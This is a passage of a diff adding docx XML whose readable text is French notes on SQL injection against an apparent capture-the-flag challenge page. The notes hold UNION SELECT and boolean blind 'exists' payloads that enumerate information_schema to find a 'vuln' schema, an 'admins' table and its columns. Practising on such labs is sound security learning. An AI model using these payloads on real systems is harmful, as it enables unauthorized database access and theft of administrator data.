+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>() LIKE ‘b%’</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId14" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Lienhypertexte"/>
+            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
+            <w:lang w:eastAsia="fr-FR"/>
+          </w:rPr>
+          <w:t>http://chall.bunkerity.com:8002/check.php?id=3%20UNION%20SELECT%20table_name,1,2%20FROM%20information_schema.tables%20--</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId15" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Lienhypertexte"/>
+            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
+            <w:lang w:eastAsia="fr-FR"/>
+          </w:rPr>
+          <w:t>http://chall.bunkerity.com:8002/check.php?id=3</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>exists</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (select </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>table_name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>fro</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>m</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>information_schema.tables</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>where</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>table_schema</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>like</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> %27vul%</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>%</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>27</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>table_name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>like</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> %27admins</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">%%27) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>return vrais</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId16" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Lienhypertexte"/>
+            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
+            <w:lang w:eastAsia="fr-FR"/>
+          </w:rPr>
+          <w:t>http://chall.bunkerity.com:8002/check.php?id=3</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>exists</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (select </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>table_name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>fro</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>m</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>information_schema.tables</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>where</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>table_schema</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> =</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> %27vul</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>n</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>%27</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>table_name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = %27admins%27</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>exists</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  (select </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>column_name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>from</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>information_schema.columns</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>where</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>column_name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
